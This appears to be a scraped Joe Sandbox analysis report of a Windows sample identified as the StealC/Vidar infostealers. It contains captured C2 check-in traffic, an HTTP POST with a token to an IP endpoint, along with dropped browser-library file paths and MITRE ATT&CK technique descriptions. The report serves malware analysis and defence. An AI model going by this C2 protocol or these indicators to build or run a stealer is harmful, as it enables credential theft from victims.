Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAECBAEGDGDHIEHIJHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 2d 2d 0d 0a Data Ascii: ------BKFBAECBAEGDGDHIEHIJContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------BKFBAECBAEGDGDHIEHIJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BKFBAECBAEGDGDHIEHIJ--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AAEBAKKJKKEBKFIDBFBA

C:\ProgramData\AFHDAEGHDGDBGDGDAAFI

C:\ProgramData\BKECBAKF

C:\ProgramData\CAKKJKKECFIDGDHIJEGDAKFBFB

C:\ProgramData\CBFBKFIDHIDGHJKFBGHCFIEHJD

C:\ProgramData\EGHCAKKEGCAAFHJJJDBK

C:\ProgramData\KFBGCAKF

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

C:\ProgramData\softokn3.dll

Windows Analysis Report
file.exe

Function 006A9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 006945C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 0069BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 006A4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 006A9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00697710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 006A0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Function 00695100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Function 0069A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Function 00695960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre